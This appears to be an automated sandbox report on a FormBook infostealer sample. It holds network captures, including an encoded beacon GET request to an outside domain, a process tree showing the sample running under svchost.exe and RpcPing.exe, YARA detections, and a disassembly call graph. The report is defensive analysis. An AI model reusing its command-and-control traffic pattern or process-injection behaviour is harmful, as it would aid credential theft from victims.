                                                                                                                                                                                                              Data Raw: 65 33 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c fc 40 5d 39 75 ca f4 3d d7 f1 54 dd d2 35 75 7c e9 8b 40 b9 8d 52 18 8d 5d 15 f6 94 c2 24 03 d5 71 64 a3 24 5d b7 24 7a 81 da c8 45 65 d1 0c 39 8a 7c d3 0e 43 4c 30 e9 ef 60 11 59 eb 0d 09 a9 7c cf c4 9f d5 e5 92 20 ed 41 59 03 d9 55 d6 15 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: e32Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk@]9u=T5u|@R]$qd$]$zEe9|CL0`Y| AYU68i]?s#[!l 7hgGUW]<ftt0y4JHPad%WAPvT6l<6,f#mSQd4Z~gma+|\|j-"RAqnj4T=E|\DL$x7 ;TJmj3h,[J~xA\!hv3y?YdnabJpAS[FlF#d0S6NmX`j(er>\4nz;hXb-`->\(|/U +!~b+&j)Rs,CH-p3;"g=k;jo,u8H%9G+GohB((=v^MH''aQ4$#;Rt2!uZe(x/$)#-8a8j)k^!pc0_kfT0\UGrXo1fmEm_G [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.925373077 CEST1236INData Raw: df d3 f6 e9 ac 13 f3 17 a8 d5 35 06 f0 65 c7 6b b9 6a 23 32 b4 5f 63 c2 28 f0 bd ee d3 8d 02 1e 06 dc 6d 0a 63 ff 02 7a 11 b3 a0 de c7 f1 3d e0 8c 47 98 e2 d8 59 d7 d5 ca 09 47 6d 6d f2 5c 92 b6 0f b6 1b 20 4a 7a 0a e3 fe 19 b1 ef 7e f2 25 5c e4
                                                                                                                                                                                                              Data Ascii: 5ekj#2_c(mcz=GYGmm\ Jz~%\qynT\@)9f@JF@towZYj!;]har`$C/0N1(j$?<,C*r>C+@?: 1AO!V?lX
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.925398111 CEST1236INData Raw: 65 95 c8 78 ff 49 a4 c9 5c 07 ca d2 71 58 e4 a9 68 0a 2f 4e bc 17 83 31 db 87 73 0a 0b d2 a3 b0 4e 89 40 31 89 45 d2 cc 69 01 67 c5 85 e3 09 34 47 4a 0c 2e 7f 04 fe fc 94 c3 3d f6 b5 0c 74 c8 73 54 c4 df 70 37 00 5a e7 1a a0 ee 1a f6 ca f9 66 9a
                                                                                                                                                                                                              Data Ascii: exI\qXh/N1sN@1Eig4GJ.=tsTp7Zf|pAP9'G'y'qP4giyMg=3y"!Tz ^{R|s;.t^JfW##Y?GDA&CU1'pT
                                                                                                                                                                                                              Oct 8, 2024 15:37:03.925409079 CEST112INData Raw: f6 2a 2c 64 ab 42 2d 8e 17 36 9d d0 0f b8 88 c7 bd 5e 34 b2 e7 67 01 8c 73 68 67 d0 d5 2f d5 e6 ae 64 8b 42 98 95 c9 8b 37 6d 74 8c 8d 47 7e 3e 1c 0b 6f 77 ce ca 76 e8 bb a3 48 ad 08 ba 0c 39 6b 9c c1 cf f0 ca 4a 49 48 17 cf 9e c8 11 74 a2 3e 99
                                                                                                                                                                                                              Data Ascii: *,dB-6^4gshg/dB7mtG~>owvH9kJIHt>0f2hS)0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              48192.168.2.960863194.58.112.174801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:37:05.782306910 CEST475OUTGET /hd7m/?tpTd=sLbEVsfW73VtVB0Jvj7gC+ceEVX4meQWoUuArYo60q3nO/kAxb5tEPXYoxmPYHkEXIEIOfWFMW/cSWDV+KoY2jgQgwLtxzjq6i8n+9HhH6xOpB1tMw==&WX=rnWllP5PLlhLLtj HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.torex33.online
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472611904 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:06 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Data Raw: 32 39 35 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 74 6f 72 65 78 33 33 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 2953<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.torex33.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472735882 CEST1236INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63
                                                                                                                                                                                                              Data Ascii: <div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.torex33.online</h1><p class="b-parking__header
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472752094 CEST448INData Raw: 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70
                                                                                                                                                                                                              Data Ascii: .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__promo-image_type_hostin
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472765923 CEST1236INData Raw: 70 3b d0 b1 d1 8b d1 81 d1 82 d1 80 d1 8b d0 b9 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 66 65 61 74 75 72 65 73 22 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69
                                                                                                                                                                                                              Data Ascii: p;</p></div></div><ul class="b-parking__features"><li class="b-parking__features-item"><strong class="b-title b-parking__features-title"></strong><p class="b-text">&nbsp;
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472784042 CEST1236INData Raw: 33 26 6e 62 73 70 3b 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 68 61 72 2d 72 6f 75 62 6c 65 2d 6e 61 74 69 76 65 22 3e 26 23 38 33 38 31 3b 3c 2f 73 70 61 6e 3e 20 3c 2f 62 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c
                                                                                                                                                                                                              Data Ascii: 3&nbsp;<span class="char-rouble-native">&#8381;</span> </b><span class="l-margin_left-small">&nbsp;</span></p></div></div><div class="b-parking__promo-item b-parking__promo-item_type_hosting"><strong class="b-title b-title_size_lar
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472804070 CEST1236INData Raw: d0 bd d0 be d0 b2 d0 ba d0 b8 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d1 8b d1 85 20 d0 bc d0 be d0 b4 d1 83 d0 bb d0 b5 d0 b9 2e 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75
                                                                                                                                                                                                              Data Ascii: .</p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/?utm_source=www.torex33.onli
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472816944 CEST1236INData Raw: 67 68 74 2d 6c 61 72 67 65 22 3e 3c 2f 73 70 61 6e 3e 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74 6c 65 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 20 62 2d 74 69 74 6c 65 5f 6d 61 72 67 69
                                                                                                                                                                                                              Data Ascii: ght-large"></span> <strong class="b-title b-title_size_large-compact b-title_margin_none">SSL- &nbsp;6 </strong><a class="b-button b-button_color_reference b-button_size_medium-compact
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.472836018 CEST896INData Raw: 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6f 6e 64 61 74 61 28 64 61 74 61 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 64 61 74 61 2e 65 72 72 6f 72 5f 63 6f
                                                                                                                                                                                                              Data Ascii: set="utf-8"></script><script>function ondata(data){ if ( data.error_code ) { return; } if ( data.ref_id ) { var links = document.querySelectorAll( 'a' ); for
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.473220110 CEST1236INData Raw: 61 63 6b 3d 6f 6e 64 61 74 61 27 3b 0a 20 20 20 20 20 20 20 20 73 63 72 69 70 74 2e 61 73 79 6e 63 20 3d 20 31 3b 0a 20 20 20 20 20 20 20 20 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 20 73 63 72 69 70 74 20 29 3b 3c 2f 73 63 72 69 70 74
                                                                                                                                                                                                              Data Ascii: ack=ondata'; script.async = 1; head.appendChild( script );</script><script>if ( 'www.torex33.online'.match( /xn--/ ) && document.querySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny' ),
                                                                                                                                                                                                              Oct 8, 2024 15:37:06.473464012 CEST746INData Raw: 6e 74 73 29 3b 7d 0a 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 33 33 38 30 39 30 39 2d 32 35 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c
                                                                                                                                                                                                              Data Ascii: nts);} gtag('js', new Date()); gtag('config', 'UA-3380909-25');</script>... Yandex.Metrika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*ne


                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:09:32:59
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Users\user\Desktop\N2Qncau2rN.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\N2Qncau2rN.exe"
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              File size:1'401'699 bytes
                                                                                                                                                                                                              MD5 hash:47D011CED9BD433871F605C662C06B55
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                              Start time:09:33:00
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\N2Qncau2rN.exe"
                                                                                                                                                                                                              Imagebase:0x110000
                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1888404688.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1886252240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1888965861.0000000006200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                              Start time:09:33:14
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe"
                                                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4128752269.0000000004BC0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:09:33:17
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\RpcPing.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\RpcPing.exe"
                                                                                                                                                                                                              Imagebase:0x5d0000
                                                                                                                                                                                                              File size:26'624 bytes
                                                                                                                                                                                                              MD5 hash:F7DD5764D96A988F0CF9DD4813751473
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4128778951.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4122907990.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4126780482.0000000002730000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                              Start time:09:33:30
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe"
                                                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4131107461.0000000004F90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                              Start time:09:33:42
                                                                                                                                                                                                              Start date:08/10/2024
                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                                                              Imagebase:0x7ff73feb0000
                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:3.4%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                                                                                                                Signature Coverage:8.8%
                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                Total number of Limit Nodes:37
                                                                                                                                                                                                                execution_graph 86143 4010e0 86146 401100 86143->86146 86145 4010f8 86147 401113 86146->86147 86148 401184 86147->86148 86149 40114c 86147->86149 86151 401120 86147->86151 86178 401182 86147->86178 86184 401250 61 API calls __call_reportfault 86148->86184 86152 401151 86149->86152 86153 40119d 86149->86153 86150 40112c DefWindowProcW 86150->86145 86151->86150 86191 401000 Shell_NotifyIconW __call_reportfault 86151->86191 86155 401219 86152->86155 86156 40115d 86152->86156 86158 4011a3 86153->86158 86159 42afb4 86153->86159 86155->86151 86162 401225 86155->86162 86160 401163 86156->86160 86161 42b01d 86156->86161 86157 401193 86157->86145 86158->86151 86168 4011b6 KillTimer 86158->86168 86169 4011db SetTimer RegisterWindowMessageW 86158->86169 86186 40f190 10 API calls 86159->86186 86165 42afe9 86160->86165 86166 40116c 86160->86166 86161->86150 86190 4370f4 52 API calls 86161->86190 86202 468b0e 74 API calls __call_reportfault 86162->86202 86188 40f190 10 API calls 86165->86188 86166->86151 86172 401174 86166->86172 86167 42b04f 86192 40e0c0 86167->86192 86185 401000 Shell_NotifyIconW __call_reportfault 86168->86185 86169->86157 86170 401204 CreatePopupMenu 86169->86170 86170->86145 86187 45fd57 65 API calls __call_reportfault 86172->86187 86177 4011c9 PostQuitMessage 86177->86145 86178->86150 86179 42afe4 86179->86157 86180 42b00e 86189 401a50 331 API calls 86180->86189 86183 42afdc 86183->86150 86183->86179 86184->86157 86185->86177 86186->86157 86187->86183 86188->86180 86189->86178 86190->86178 86191->86167 86194 40e0e7 __call_reportfault 86192->86194 86193 40e142 86195 40e184 86193->86195 86225 4341e6 63 API calls __wcsicoll 86193->86225 86194->86193 86196 42729f DestroyIcon 86194->86196 86198 40e1a0 Shell_NotifyIconW 86195->86198 86199 4272db Shell_NotifyIconW 86195->86199 86196->86193 86203 401b80 86198->86203 86201 40e1ba 86201->86178 86202->86179 86204 401b9c 86203->86204 86224 401c7e 86203->86224 86226 4013c0 86204->86226 86207 42722b LoadStringW 86210 427246 86207->86210 86208 401bb9 86231 402160 86208->86231 86245 40e0a0 86210->86245 86211 401bcd 86213 427258 86211->86213 86214 401bda 86211->86214 86249 40d200 52 API calls 2 library calls 86213->86249 86214->86210 86215 401be4 86214->86215 86244 40d200 52 API calls 2 library calls 86215->86244 86218 427267 86219 42727b 86218->86219 86221 401bf3 _wcscpy __call_reportfault _wcsncpy 86218->86221 86250 40d200 52 API calls 2 library calls 86219->86250 86223 401c62 Shell_NotifyIconW 86221->86223 86222 427289 86223->86224 86224->86201 86225->86195 86251 4115d7 86226->86251 86232 426daa 86231->86232 86233 40216b _wcslen 86231->86233 86289 40c600 86232->86289 86236 402180 86233->86236 86237 40219e 86233->86237 86235 426db5 86235->86211 86288 403bd0 52 API calls moneypunct 86236->86288 86238 4013a0 52 API calls 86237->86238 86240 4021a5 86238->86240 86242 426db7 86240->86242 86243 4115d7 52 API calls 86240->86243 86241 402187 _memmove 86241->86211 86243->86241 86244->86221 86246 40e0b2 86245->86246 86247 40e0a8 86245->86247 86246->86221 86301 403c30 52 API calls _memmove 86247->86301 86249->86218 86250->86222 86253 4115e1 _malloc 86251->86253 86254 4013e4 86253->86254 86257 4115fd std::exception::exception 86253->86257 86265 4135bb 86253->86265 86262 4013a0 86254->86262 86255 41163b 86280 4180af 46 API calls std::exception::operator= 86255->86280 86257->86255 86279 41130a 51 API calls __cinit 86257->86279 86258 411645 86281 418105 RaiseException 86258->86281 86261 411656 86263 4115d7 52 API calls 86262->86263 86264 4013a7 86263->86264 86264->86207 86264->86208 86266 413638 _malloc 86265->86266 86272 4135c9 _malloc 86265->86272 86287 417f77 46 API calls __getptd_noexit 86266->86287 86269 4135f7 RtlAllocateHeap 86269->86272 86278 413630 86269->86278 86271 413624 86285 417f77 46 API calls __getptd_noexit 86271->86285 86272->86269 86272->86271 86275 4135d4 86272->86275 86276 413622 86272->86276 86275->86272 86282 418901 46 API calls 2 library calls 86275->86282 86283 418752 46 API calls 8 library calls 86275->86283 86284 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86275->86284 86286 417f77 46 API calls __getptd_noexit 86276->86286 86278->86253 86279->86255 86280->86258 86281->86261 86282->86275 86283->86275 86285->86276 86286->86278 86287->86278 86288->86241 86290 40c619 86289->86290 86291 40c60a 86289->86291 86290->86235 86291->86290 86294 4026f0 86291->86294 86293 426d7a _memmove 86293->86235 86295 426873 86294->86295 86296 4026ff 86294->86296 86297 4013a0 52 API calls 86295->86297 86296->86293 86298 42687b 86297->86298 86299 4115d7 52 API calls 86298->86299 86300 42689e _memmove 86299->86300 86300->86293 86301->86246 86302 40bd20 86304 40bd2d 86302->86304 86307 428194 86302->86307 86303 40bd43 86311 40bd37 86304->86311 86325 4531b1 85 API calls 5 library calls 86304->86325 86306 4281bc 86324 45e987 86 API calls moneypunct 86306->86324 86307->86303 86307->86306 86310 4281b2 86307->86310 86323 40b510 VariantClear 86310->86323 86314 40bd50 86311->86314 86313 4281ba 86315 426cf1 86314->86315 86316 40bd63 86314->86316 86335 44cde9 52 API calls _memmove 86315->86335 86326 40bd80 86316->86326 86319 40bd73 86319->86303 86320 426cfc 86321 40e0a0 52 API calls 86320->86321 86322 426d02 86321->86322 86323->86313 86324->86304 86325->86311 86327 40bd8e 86326->86327 86334 40bdb7 _memmove 86326->86334 86328 40bded 86327->86328 86329 40bdad 86327->86329 86327->86334 86330 4115d7 52 API calls 86328->86330 86336 402f00 86329->86336 86332 40bdf6 86330->86332 86333 4115d7 52 API calls 86332->86333 86332->86334 86333->86334 86334->86319 86335->86320 86337 402f10 86336->86337 86338 402f0c 86336->86338 86339 4268c3 86337->86339 86340 4115d7 52 API calls 86337->86340 86338->86334 86341 402f51 moneypunct _memmove 86340->86341 86341->86334 86342 425ba2 86347 40e360 86342->86347 86344 425bb4 86363 41130a 51 API calls __cinit 